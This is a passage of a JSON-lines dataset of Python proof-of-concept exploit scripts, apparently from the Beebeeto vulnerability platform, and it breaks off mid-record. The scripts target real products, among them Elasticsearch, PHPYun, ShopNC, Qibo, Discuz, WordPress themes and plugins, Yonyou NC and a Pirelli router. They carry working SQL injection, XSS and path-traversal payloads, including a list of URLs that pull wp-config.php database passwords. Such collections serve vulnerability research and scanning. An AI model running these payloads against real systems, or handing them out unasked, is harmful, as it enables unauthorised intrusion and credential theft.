'%s://%s:9200/_nodes/stats' % (target.scheme, target.netloc)\r\n if args['options']['verbose']:\r\n print '[*] Request URL: ' + verify_url\r\n try:\r\n content = requests.get(verify_url, timeout=5).text\r\n except:\r\n content = ''\r\n if 'cluster_name' in content and 'transport_address\":' in content:\r\n args['success'] = True\r\n args['poc_ret']['vul_url'] = verify_url\r\n return args\r\n\r\n exploit = verify\r\n\r\n\r\nif __name__ == '__main__':\r\n from pprint import pprint\r\n\r\n mp = MyPoc()\r\n pprint(mp.run())", "desc": "\u9ed8\u8ba4\u60c5\u51b5\uff0cElasticsearch\u5f00\u542f\u540e\u4f1a\u76d1\u542c9200\u7aef\u53e3\u53ef\u4ee5\u5728\u672a\u6388\u6743\u7684\u60c5\u51b5\u4e0b\u8bbf\u95ee\uff0c\u4ece\u800c\u5bfc\u81f4\u654f\u611f\u4fe1\u606f\u6cc4\u6f0f", "app_name": "ElasticSearch", "id": "poc-2015-0014", "layer4_protocol": null}
{"create_date": "2015-01-16 22:48:36", "name": "PHPYun 3.1 /wap/member/model/index.class.php SQL\u6ce8\u5165\u6f0f\u6d1e POC", "level": "\u4e2d\u5371", "batchable": 1, "author": "tmp", "rank": 3, "port": null, "vul_type": "SQL\u6ce8\u5165", "tag": "PHPYun\u6f0f\u6d1e,/wap/member/model/index.class.php,php", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport re\r\nimport urllib2\r\n\r\n\r\nfrom baseframe import BaseFrame\r\nfrom utils.http.forgeheaders import ForgeHeaders\r\n\r\n\r\nclass MyPoc(BaseFrame):\r\n poc_info = {\r\n # poc\u76f8\u5173\u4fe1\u606f\r\n 'poc': {\r\n 'id': 'poc-2015-0012',\r\n 'name': 'PHPYun 3.1 /wap/member/model/index.class.php SQL\u6ce8\u5165\u6f0f\u6d1e POC',\r\n 'author': 'tmp',\r\n 'create_date': '2015-01-16',\r\n },\r\n # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n 'protocol': {\r\n 'name': 'http',\r\n 'port': [80],\r\n 'layer4_protocol': ['tcp'],\r\n },\r\n # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n 'vul': {\r\n 'app_name': 'PHPYun',\r\n 'vul_version': ['3.1'],\r\n 'type': 'SQL Injection',\r\n 'tag': ['PHPYun\u6f0f\u6d1e', '/wap/member/model/index.class.php', 'php'],\r\n 'desc': '/wap/member/model/index.class.php \u8fc7\u6ee4\u4e0d\u4e25\u8c28',\r\n 'references': ['http://www.wooyun.org/bugs/wooyun-2014-071296',\r\n ],\r\n },\r\n }\r\n\r\n\r\n @classmethod\r\n def verify(cls, args):\r\n fake_headers = ForgeHeaders().get_headers()\r\n fake_headers['User-Agent'] = \"iPhone6\"\r\n check_url = '%s/index.php?m=resume&id=999999' % args['options']['target']\r\n verify_url = '%s/wap/member/index.php?m=index&c=saveresume' % args['options']['target']\r\n data = 'table=expect%60%20%28id%2Cuid%2Cname%29%20values%20%28' \\\r\n '999999%2C1%2C%28md5%280x23333333%29%29%29%23&subm' \\\r\n 'it=111&eid=1'\r\n req = urllib2.Request(verify_url, data=data, headers=fake_headers)\r\n urllib2.urlopen(req)\r\n if args['options']['verbose']:\r\n print '[*] Request URL: ' + verify_url\r\n content = urllib2.urlopen(check_url).read()\r\n if '2eb120797101bb291fd4a6764' in content:\r\n args['success'] = True\r\n args['poc_ret']['vul_url'] = verify_url\r\n args['poc_ret']['post_data'] = data\r\n return args\r\n\r\n exploit = verify\r\n\r\n\r\nif __name__ == '__main__':\r\n from pprint import pprint\r\n\r\n mp = MyPoc()\r\n pprint(mp.run())", "desc": "/wap/member/model/index.class.php \u8fc7\u6ee4\u4e0d\u4e25\u8c28", "app_name": "phpyun", "id": "poc-2015-0012", "layer4_protocol": null}
{"create_date": "2015-01-16 11:50:01", "name": "Wordpress Plugin Pods <= 2.4.3 XSS\u6f0f\u6d1e POC", "level": "\u4f4e\u5371", "batchable": 0, "author": "\u585e\u4e07\u94c1\u725b", "rank": 2, "port": null, "vul_type": "\u8de8\u7ad9\u6f0f\u6d1e", "tag": "Wordpress\u6f0f\u6d1e,Pods plugin\u6f0f\u6d1e,/wp-admin/admin.php,php,CVE-2014-7956", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\n\r\nimport urllib2\r\n\r\nfrom baseframe import BaseFrame\r\n\r\n\r\nclass MyPoc(BaseFrame):\r\n poc_info = {\r\n # poc\u76f8\u5173\u4fe1\u606f\r\n 'poc': {\r\n 'id': 'poc-2015-0010',\r\n 'name': 'Wordpress Plugin Pods <= 2.4.3 XSS\u6f0f\u6d1e POC',\r\n 'author': '\u585e\u4e07\u94c1\u725b',\r\n 'create_date': '2015-01-16',\r\n },\r\n # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n 'protocol': {\r\n 'name': 'http',\r\n 'port': [80],\r\n 'layer4_protocol': ['tcp'],\r\n },\r\n # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n 'vul': {\r\n 'app_name': 'Wordpress with Pods plugin',\r\n 'vul_version': ['<=2.4.3'],\r\n 'type': 'Cross Site Scripting',\r\n 'tag': ['Wordpress\u6f0f\u6d1e', 'Pods plugin\u6f0f\u6d1e', '/wp-admin/admin.php', 'php', 'CVE-2014-7956'],\r\n 'desc': '''\r\n Wordpress:\u5c0f\u4e8e2.4\u7248\u672c\u7684Pods\u63d2\u4ef6\u4e2d<a>\u6807\u8bb0\u672a\u95ed\u5408\uff0c\u5bfc\u81f4HTTP GET\u53c2\u6570\u6570\u636e\u4e2d\uff0c\u53ef\u4ee5\u4ea7\u751f\u53cd\u5c04\u578b\u7684xss\u6f0f\u6d1e\u3002\r\n ''',\r\n 'references': ['http://www.securityfocus.com/archive/1/534437',\r\n ],\r\n },\r\n }\r\n\r\n\r\n @classmethod\r\n def verify(cls, args):\r\n payload = '/wp-admin/admin.php?page=pods&action=edit&id=4\"></a><script>alert(1)</script><!--'\r\n verify_url = args['options']['target'] + payload\r\n req = urllib2.Request(verify_url)\r\n if args['options']['verbose']:\r\n print '[*] Request URL: ' + verify_url\r\n content = urllib2.urlopen(req).read()\r\n if '<script>alert(1)</script>' in content:\r\n args['success'] = True\r\n args['poc_ret']['vul_url'] = verify_url\r\n return args\r\n\r\n exploit = verify\r\n\r\n\r\nif __name__ == '__main__':\r\n from pprint import pprint\r\n\r\n mp = MyPoc()\r\n pprint(mp.run())", "desc": "Wordpress:\u5c0f\u4e8e2.4\u7248\u672c\u7684Pods\u63d2\u4ef6\u4e2d<a>\u6807\u8bb0\u672a\u95ed\u5408\uff0c\u5bfc\u81f4HTTP GET\u53c2\u6570\u6570\u636e\u4e2d\uff0c\u53ef\u4ee5\u4ea7\u751f\u53cd\u5c04\u578b\u7684xss\u6f0f\u6d1e\u3002", "app_name": "WordPress", "id": "poc-2015-0010", "layer4_protocol": null}
{"create_date": "2015-01-15 14:20:07", "name": "\u7528\u53cbNC /hrss/ELTextFile.load.d \u4fe1\u606f\u6cc4\u6f0f\u6f0f\u6d1e POC", "level": "\u4f4e\u5371", "batchable": 1, "author": "1024", "rank": 2, "port": null, "vul_type": "\u4fe1\u606f\u6cc4\u6f0f", "tag": "\u7528\u53cb\u6f0f\u6d1e,Yonyou\u4fe1\u606f\u6cc4\u6f0f\u6f0f\u6d1e,/hrss/ELTextFile.load.d", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport re\r\nimport urllib2\r\n\r\n\r\nfrom baseframe import BaseFrame\r\n\r\n\r\nclass MyPoc(BaseFrame):\r\n poc_info = {\r\n # poc\u76f8\u5173\u4fe1\u606f\r\n 'poc': {\r\n 'id': 'poc-2015-0008',\r\n 'name': '\u7528\u53cbNC /hrss/ELTextFile.load.d \u4fe1\u606f\u6cc4\u6f0f\u6f0f\u6d1e POC',\r\n 'author': '1024',\r\n 'create_date': '2015-01-14',\r\n },\r\n # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n 'protocol': {\r\n 'name': 'http',\r\n 'port': [80],\r\n 'layer4_protocol': ['tcp'],\r\n },\r\n # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n 'vul': {\r\n 'app_name': '\u7528\u6709',\r\n 'vul_version': ['NC'],\r\n 'type': 'Information Disclosure',\r\n 'tag': ['\u7528\u53cb\u6f0f\u6d1e', 'Yonyou\u4fe1\u606f\u6cc4\u6f0f\u6f0f\u6d1e', '/hrss/ELTextFile.load.d'],\r\n 'desc': '../../ierp/bin/prop.xml',\r\n 'references': ['http://wooyun.org/bugs/wooyun-2014-066512',\r\n ],\r\n },\r\n }\r\n\r\n\r\n @classmethod\r\n def verify(cls, args):\r\n verify_url = '%s/hrss/ELTextFile.load.d?src=../../ierp/bin/prop.xml' % args['options']['target']\r\n req = urllib2.Request(verify_url)\r\n content = urllib2.urlopen(req).read()\r\n if args['options']['verbose']:\r\n print '[*] Request URL: ' + verify_url\r\n if 'enableHotDeploy' in content and 'internalServiceArray' in content:\r\n args['success'] = True\r\n args['poc_ret']['vul_url'] = verify_url\r\n return args\r\n\r\n exploit = verify\r\n\r\n\r\nif __name__ == '__main__':\r\n from pprint import pprint\r\n\r\n mp = MyPoc()\r\n pprint(mp.run())", "desc": "../../ierp/bin/prop.xml", "app_name": "\u7528\u53cb\uff08Yonyou\uff09", "id": "poc-2015-0008", "layer4_protocol": null}
{"create_date": "2015-01-14 17:28:57", "name": "ShopNc v6.0 /index.php SQL\u6ce8\u5165\u6f0f\u6d1e POC", "level": "\u4e2d\u5371", "batchable": 1, "author": "1024", "rank": 3, "port": null, "vul_type": "SQL\u6ce8\u5165", "tag": "ShopNc\u6f0f\u6d1e,ShopNcSQL\u6ce8\u5165\u6f0f\u6d1e,/index.php,php", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport re\r\nimport urllib2\r\n\r\n\r\nfrom baseframe import BaseFrame\r\nfrom utils.http.forgeheaders import ForgeHeaders\r\n\r\n\r\nclass MyPoc(BaseFrame):\r\n poc_info = {\r\n # poc\u76f8\u5173\u4fe1\u606f\r\n 'poc': {\r\n 'id': 'poc-2015-0007',\r\n 'name': 'ShopNc v6.0 /index.php SQL\u6ce8\u5165\u6f0f\u6d1e POC',\r\n 'author': '1024',\r\n 'create_date': '2015-01-14',\r\n },\r\n # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n 'protocol': {\r\n 'name': 'http',\r\n 'port': [80],\r\n 'layer4_protocol': ['tcp'],\r\n },\r\n # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n 'vul': {\r\n 'app_name': 'ShopNc',\r\n 'vul_version': ['6.0'],\r\n 'type': 'SQL Injection',\r\n 'tag': ['ShopNc\u6f0f\u6d1e', 'ShopNcSQL\u6ce8\u5165\u6f0f\u6d1e', '/index.php', 'php'],\r\n 'desc': '''\r\n Site footer:\r\n ShopNC\u00ae*******\u79d1\u6280\u6709\u9650\u516c\u53f8\r\n Copyright\u00a9 2007-2009 ShopNC, Powered by ShopNC Team\r\n ''',\r\n 'references': ['http://0day5.com/archives/1218',\r\n ],\r\n },\r\n }\r\n\r\n\r\n @classmethod\r\n def verify(cls, args):\r\n fake_headers = ForgeHeaders().get_headers()\r\n fake_headers['Referer'] = (\"http://baidu.com'and(select 1 from(select count(*),concat(\"\r\n \"floor(rand(0)*2),0x3a,(select(select(SELECT md5(233333)))\"\r\n \"from information_schema.tables limit 0,1))x from information_schema\"\r\n \".tables group by x)a) and 1=1)#\")\r\n verify_url = args['options']['target']\r\n req = urllib2.Request(verify_url, headers=fake_headers)\r\n content = urllib2.urlopen(req).read()\r\n if args['options']['verbose']:\r\n print '[*] Request URL: ' + verify_url\r\n if 'fb0b32aeafac4591c7ae6d5e58308344' in content:\r\n args['success'] = True\r\n args['poc_ret']['vul_url'] = verify_url\r\n args['poc_ret']['headers_referer'] = fake_headers['Referer']\r\n return args\r\n\r\n exploit = verify\r\n\r\n\r\nif __name__ == '__main__':\r\n from pprint import pprint\r\n\r\n mp = MyPoc()\r\n pprint(mp.run())", "desc": "Site footer:\r\n ShopNC\u00ae*******\u79d1\u6280\u6709\u9650\u516c\u53f8\r\n Copyright\u00a9 2007-2009 ShopNC, Powered by ShopNC Team", "app_name": "ShopNC", "id": "poc-2015-0007", "layer4_protocol": null}
{"create_date": "2015-01-08 01:40:01", "name": "Pirelli ADSL2/2+ Wireless Router P.DGA4001N \u4fe1\u606f\u6cc4\u6f0f\u6f0f\u6d1e POC", "level": "\u4f4e\u5371", "batchable": 1, "author": "foundu", "rank": 3, "port": null, "vul_type": "\u4fe1\u606f\u6cc4\u6f0f", "tag": "Pirelli\u8def\u7531\u6f0f\u6d1e,Pirelli\u4fe1\u606f\u6cc4\u6f0f\u6f0f\u6d1e,/wlsecurity.html", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport urllib2\r\n\r\nfrom baseframe import BaseFrame\r\n\r\n\r\nclass MyPoc(BaseFrame):\r\n poc_info = {\r\n # poc\u76f8\u5173\u4fe1\u606f\r\n 'poc': {\r\n 'id': 'poc-2015-0004',\r\n 'name': 'Pirelli ADSL2/2+ Wireless Router P.DGA4001N \u4fe1\u606f\u6cc4\u6f0f\u6f0f\u6d1e POC',\r\n 'author': 'foundu',\r\n 'create_date': '2015-01-08',\r\n },\r\n # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n 'protocol': {\r\n 'name': 'http',\r\n 'port': [80],\r\n 'layer4_protocol': ['tcp'],\r\n },\r\n # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n 'vul': {\r\n 'app_name': 'Pirelli',\r\n 'vul_version': ['ADSL2/2+'],\r\n 'type': 'Information Disclosure',\r\n 'tag': ['Pirelli\u8def\u7531\u6f0f\u6d1e', 'Pirelli\u4fe1\u606f\u6cc4\u6f0f\u6f0f\u6d1e', '/wlsecurity.html'],\r\n 'desc': 'Tested on firmware version PDG_TEF_SP_4.06L.6',\r\n 'references': ['http://www.exploit-db.com/exploits/35721/',\r\n ],\r\n },\r\n }\r\n\r\n\r\n @classmethod\r\n def verify(cls, args):\r\n verify_url = \"%s/wlsecurity.html\" % args['options']['target']\r\n req = urllib2.Request(verify_url)\r\n if args['options']['verbose']:\r\n print '[*] Request URL: ' + verify_url\r\n content = urllib2.urlopen(req).read()\r\n if \"var wpaPskKey = '\" in content or \"var sessionKey\" in content:\r\n args['success'] = True\r\n args['poc_ret']['vul_url'] = verify_url\r\n return args\r\n\r\n exploit = verify\r\n\r\n\r\nif __name__ == '__main__':\r\n from pprint import pprint\r\n\r\n mp = MyPoc()\r\n pprint(mp.run())", "desc": "Tested on firmware version PDG_TEF_SP_4.06L.6", "app_name": "Other", "id": "poc-2015-0004", "layer4_protocol": null}
{"create_date": "2015-01-04 16:09:57", "name": "\u9f50\u535a\u5730\u65b9\u95e8\u6237\u7cfb\u7edf /coupon/s.php SQL\u6ce8\u5165\u6f0f\u6d1e POC", "level": "\u4e2d\u5371", "batchable": 1, "author": "Tomato", "rank": 4, "port": null, "vul_type": "SQL\u6ce8\u5165", "tag": "\u9f50\u535a\u6f0f\u6d1e,SQL\u6ce8\u5165\u6f0f\u6d1e,/coupon/s.php,php", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport urllib2\r\n\r\nfrom baseframe import BaseFrame\r\n\r\n\r\nclass MyPoc(BaseFrame):\r\n poc_info = {\r\n # poc\u76f8\u5173\u4fe1\u606f\r\n 'poc': {\r\n 'id': 'poc-2015-0002',\r\n 'name': '\u9f50\u535a\u5730\u65b9\u95e8\u6237\u7cfb\u7edf /coupon/s.php SQL\u6ce8\u5165\u6f0f\u6d1e POC',\r\n 'author': 'Tomato',\r\n 'create_date': '2015-01-02',\r\n },\r\n # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n 'protocol': {\r\n 'name': 'http',\r\n 'port': [80],\r\n 'layer4_protocol': ['tcp'],\r\n },\r\n # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n 'vul': {\r\n 'app_name': 'Qibo',\r\n 'vul_version': ['*'],\r\n 'type': 'SQL Injection',\r\n 'tag': ['\u9f50\u535a\u6f0f\u6d1e', 'SQL\u6ce8\u5165\u6f0f\u6d1e', '/coupon/s.php', 'php'],\r\n 'desc': '\u95ee\u9898\u51fa\u5728\u9f50\u535a\u641c\u7d22\u7684\u4f4d\u7f6e\uff0c\u4e5f\u5c31\u662f\uff1ahttp://life.qibosoft.com/coupon/s.php',\r\n 'references': ['http://wooyun.org/bugs/wooyun-2014-079938',\r\n ],\r\n },\r\n }\r\n\r\n\r\n @classmethod\r\n def verify(cls, args):\r\n payload = \"/coupon/s.php?action=search&keyword=11&fid=1&fids[]=0)%20union%20select%20md5(1),2,3,4,5,6,7,8,9%23\"\r\n verify_url = args['options']['target'] + payload\r\n req = urllib2.Request(verify_url)\r\n if args['options']['verbose']:\r\n print '[*] Request URL: ' + verify_url\r\n content = urllib2.urlopen(req).read()\r\n if \"c4ca4238a0b923820dcc509a6f75849b\" in content:\r\n args['success'] = True\r\n args['poc_ret']['vul_url'] = verify_url\r\n return args\r\n\r\n exploit = verify\r\n\r\n\r\nif __name__ == '__main__':\r\n from pprint import pprint\r\n\r\n mp = MyPoc()\r\n pprint(mp.run())", "desc": "\u95ee\u9898\u51fa\u5728\u9f50\u535a\u641c\u7d22\u7684\u4f4d\u7f6e\uff0c\u4e5f\u5c31\u662f\uff1ahttp://life.qibosoft.com/coupon/s.php", "app_name": "qibocms", "id": "poc-2015-0002", "layer4_protocol": null}
{"create_date": "2015-01-01 00:37:47", "name": "Discuz! 7.2 /admincp.php \u8de8\u7ad9\u811a\u672c\u6f0f\u6d1e POC", "level": "\u4f4e\u5371", "batchable": 1, "author": "tmp", "rank": 2, "port": null, "vul_type": "\u8de8\u7ad9\u6f0f\u6d1e", "tag": "Discuz\u6f0f\u6d1e,XSS\u6f0f\u6d1e,/admincp.php,php", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport urllib2\r\n\r\nfrom baseframe import BaseFrame\r\n\r\n\r\nclass MyPoc(BaseFrame):\r\n poc_info = {\r\n # poc\u76f8\u5173\u4fe1\u606f\r\n 'poc': {\r\n 'id': 'poc-2015-0001',\r\n 'name': 'Discuz! 7.2 /admincp.php \u8de8\u7ad9\u811a\u672c\u6f0f\u6d1e POC',\r\n 'author': 'tmp',\r\n 'create_date': '2014-12-31',\r\n },\r\n # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n 'protocol': {\r\n 'name': 'http',\r\n 'port': [80],\r\n 'layer4_protocol': ['tcp'],\r\n },\r\n # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n 'vul': {\r\n 'app_name': 'Discuz',\r\n 'vul_version': ['7.2'],\r\n 'type': 'Cross Site Scripting',\r\n 'tag': ['Discuz\u6f0f\u6d1e', 'XSS\u6f0f\u6d1e', '/admincp.php', 'php'],\r\n 'desc': 'Cross site scripting has benn found on /admincp.php file.',\r\n 'references': ['http://www.wooyun.org/bugs/wooyun-2014-084097',\r\n ],\r\n },\r\n }\r\n\r\n\r\n @classmethod\r\n def verify(cls, args):\r\n verify_url = args['options']['target'] + \"/admincp.php?infloat=yes&handlekey=123);alert(/bb2/);//\"\r\n req = urllib2.Request(verify_url)\r\n if args['options']['verbose']:\r\n print '[*] Request URL: ' + verify_url\r\n content = urllib2.urlopen(req).read()\r\n if \"if($('return_123);alert(/bb2/);//'\" in content:\r\n args['success'] = True\r\n args['poc_ret']['vul_url'] = verify_url\r\n return args\r\n\r\n exploit = verify\r\n\r\n\r\nif __name__ == '__main__':\r\n from pprint import pprint\r\n\r\n mp = MyPoc()\r\n pprint(mp.run())", "desc": "Cross site scripting has benn found on /admincp.php file.", "app_name": "Discuz", "id": "poc-2015-0001", "layer4_protocol": null}
{"create_date": "2014-12-29 16:47:00", "name": "WordPress Multiple themes /download.php Arbitrary File Download POC", "level": "\u4e2d\u5371", "batchable": 1, "author": "Lyleaks", "rank": 4, "port": null, "vul_type": "\u4efb\u610f\u6587\u4ef6\u4e0b\u8f7d", "tag": "Wordpress\u63d2\u4ef6\u6f0f\u6d1e,Themes,Arbitrary File Download,php", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport urllib2\r\n\r\nfrom baseframe import BaseFrame\r\n\r\nclass MyPoc(BaseFrame):\r\n poc_info = {\r\n # poc\u76f8\u5173\u4fe1\u606f\r\n 'poc': {\r\n 'id': 'poc-2014-0222',\r\n 'name': 'WordPress Multiple themes /download.php Arbitrary File Download POC',\r\n 'author': 'Lyleaks',\r\n 'create_date': '2014-12-29',\r\n },\r\n # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n 'protocol': {\r\n 'name': 'http',\r\n 'port': [80],\r\n 'layer4_protocol': ['tcp'],\r\n },\r\n # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n 'vul': {\r\n 'app_name': 'Wordpress',\r\n 'vul_version': ['*'],\r\n 'type': 'Arbitrary File Download',\r\n 'tag': ['Wordpress\u63d2\u4ef6\u6f0f\u6d1e', 'Themes', 'Arbitrary File Download', 'php'],\r\n 'desc': '\"download_file\" variable is not sanitized.',\r\n 'references': ['http://packetstormsecurity.com/files/129706/wptheme-download.txt',\r\n ],\r\n },\r\n }\r\n\r\n @classmethod\r\n def verify(cls, args):\r\n payload = [\r\n '/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php',\r\n '/wp-content/force-download.php?file=../wp-config.php',\r\n '/wp-content/themes/acento/includes/view-pdf.php?download=1&file=/path/wp-config.php',\r\n '/wp-content/themes/SMWF/inc/download.php?file=../wp-config.php',\r\n '/wp-content/themes/markant/download.php?file=../../wp-config.php',\r\n '/wp-content/themes/yakimabait/download.php?file=./wp-config.php',\r\n '/wp-content/themes/TheLoft/download.php?file=../../../wp-config.php',\r\n '/wp-content/themes/felis/download.php?file=../wp-config.php',\r\n '/wp-content/themes/MichaelCanthony/download.php?file=../../../wp-config.php',\r\n '/wp-content/themes/trinity/lib/scripts/download.php?file=../../../../../wp-config.php'\r\n '/wp-content/themes/epic/includes/download.php?file=wp-config.php',\r\n '/wp-content/themes/urbancity/lib/scripts/download.php?file=../../../../../wp-config.php',\r\n '/wp-content/themes/antioch/lib/scripts/download.php?file=../../../../../wp-config.php',\r\n '/wp-content/themes/authentic/includes/download.php?file=../../../../wp-config.php',\r\n '/wp-content/themes/churchope/lib/downloadlink.php?file=../../../../wp-config.php',\r\n '/wp-content/themes/lote27/download.php?download=../../../wp-config.php',\r\n '/wp-content/themes/RedSteel/download.php?file=../../../wp-config.php',\r\n '/wp-content/themes/linenity/functions/download.php?imgurl=../../../../wp-config.php',\r\n '/wp-content/themes/mTheme-Unus/css/css.php?files=../../../../wp-config.php'\r\n ]\r\n args['poc_ret']['file_path'] = []\r\n for filename in payload:\r\n verify_url = args['options']['target'] + filename\r\n if args['options']['verbose']:\r\n print '[*] Request URL: ' + verify_url\r\n try:\r\n req = urllib2.Request(verify_url)\r\n content = urllib2.urlopen(req).read()\r\n except:\r\n continue\r\n if 'DB_PASSWORD' in content and 'DB_USER' in content:\r\n args['success'] = True\r\n args['poc_ret']['file_path'].append(verify_url)\r\n if not args['poc_ret']['file_path']:\r\n args['poc_ret'].pop('file_path')\r\n args['success'] = False\r\n return args\r\n\r\n\r\n exploit = verify\r\n\r\n\r\nif __name__ == '__main__':\r\n from pprint import pprint\r\n\r\n mp = MyPoc()\r\n pprint(mp.run())", "desc": "\"download_file\" variable is not sanitized.", "app_name": "WordPress", "id": "poc-2014-0222", "layer4_protocol": null}
{"create_date": "2014-12-27 16:03:46", "name": "Qibo Information V1 /search.php \u8de8\u7ad9\u811a\u672c\u6f0f\u6d1e POC", "level": "\u4f4e\u5371", "batchable": 1, "author": "user1018", "rank": 2, "port": null, "vul_type": "\u8de8\u7ad9\u6f0f\u6d1e", "tag": "Qibo\u6f0f\u6d1e,XSS\u6f0f\u6d1e,/search.php,php", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport urllib2\r\n\r\nfrom baseframe import BaseFrame\r\n\r\n\r\nclass MyPoc(BaseFrame):\r\n poc_info = {\r\n # poc\u76f8\u5173\u4fe1\u606f\r\n 'poc': {\r\n 'id': 'poc-2014-0219',\r\n 'name': 'Qibo Information V1 /search.php \u8de8\u7ad9\u811a\u672c\u6f0f\u6d1e POC',\r\n 'author': 'user1018',\r\n 'create_date': '2014-12-27',\r\n },\r\n # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n 'protocol': {\r\n 'name': 'http',\r\n 'port': [80],\r\n 'layer4_protocol': ['tcp'],\r\n },\r\n # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n 'vul': {\r\n 'app_name': 'Qibo',\r\n 'vul_version': ['v1'],\r\n 'type': 'Cross Site Scripting',\r\n 'tag': ['Qibo\u6f0f\u6d1e', 'XSS\u6f0f\u6d1e', '/search.php', 'php'],\r\n 'desc': '''\r\n \u7531\u4e8e\u5168\u5c40\u53d8\u91cf\u53ef\u63a7\uff0c\u901a\u8fc7\u63a7\u5236\u53d8\u91cf\u53ef\u4ee5\u8fdb\u884c\u53cd\u5c04\u578b XSS\u3002\r\n ''',\r\n 'references': ['N/A'],\r\n },\r\n }\r\n\r\n\r\n @classmethod\r\n def verify(cls, args):\r\n payload = '/search.php?module_db[]=<iframe/onload=alert(bb2)><!--'\r\n verify_url = args['options']['target'] + payload\r\n req = urllib2.Request(verify_url)\r\n if args['options']['verbose']:\r\n print '[*] Request URL: ' + verify_url\r\n content = urllib2.urlopen(req).read()\r\n if '<iframe/onload=alert(bb2)><!--' in content:\r\n args['success'] = True\r\n args['poc_ret']['vul_url'] = verify_url\r\n return args\r\n\r\n exploit = verify\r\n\r\n\r\nif __name__ == '__main__':\r\n from pprint import pprint\r\n\r\n mp = MyPoc()\r\n pprint(mp.run())", "desc": "\u7531\u4e8e\u5168\u5c40\u53d8\u91cf\u53ef\u63a7\uff0c\u901a\u8fc7\u63a7\u5236\u53d8\u91cf\u53ef\u4ee5\u8fdb\u884c\u53cd\u5c04\u578b XSS\u3002", "app_name": "qibocms", "id": "poc-2014-0219", "layer4_protocol": null}
{"create_date": "2014-12-27 15:40:05", "name": "Yidacms v3.2 /Yidacms/user/user.asp \u8fdc\u7a0b\u5bc6\u7801\u4fee\u6539\u6f0f\u6d1e Exploit", "level": "\u4e2d\u5371", "batchable": 1, "author": "user1018", "rank": 4, "port": null, "vul_type": "\u8fdc\u7a0b\u5bc6\u7801\u4fee\u6539", "tag": "Yidacms\u6f0f\u6d1e,Yidacms\u8fdc\u7a0b\u5bc6\u7801\u4fee\u6539\u6f0f\u6d1e,asp", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport re\r\nimport urllib\r\nimport requests\r\n\r\n\r\nfrom baseframe import BaseFrame\r\n\r\n\r\nclass MyPoc(BaseFrame):\r\n poc_info = {\r\n # poc\u76f8\u5173\u4fe1\u606f\r\n 'poc': {\r\n 'id': 'poc-2014-0217',\r\n 'name': 'Yidacms v3.2 /Yidacms/user/user.asp \u8fdc\u7a0b\u5bc6\u7801\u4fee\u6539\u6f0f\u6d1e Exploit',\r\n 'author': 'user1018',\r\n 'create_date': '2014-12-27',\r\n },\r\n # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n 'protocol': {\r\n 'name': 'http',\r\n 'port': [80],\r\n 'layer4_protocol': ['tcp'],\r\n },\r\n # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n 'vul': {\r\n 'app_name': 'Yidacms',\r\n 'vul_version': ['3.2'],\r\n 'type': 'Remote Password Change',\r\n 'tag': ['Yidacms\u6f0f\u6d1e', 'Yidacms\u8fdc\u7a0b\u5bc6\u7801\u4fee\u6539\u6f0f\u6d1e', 'asp'],\r\n 'desc': 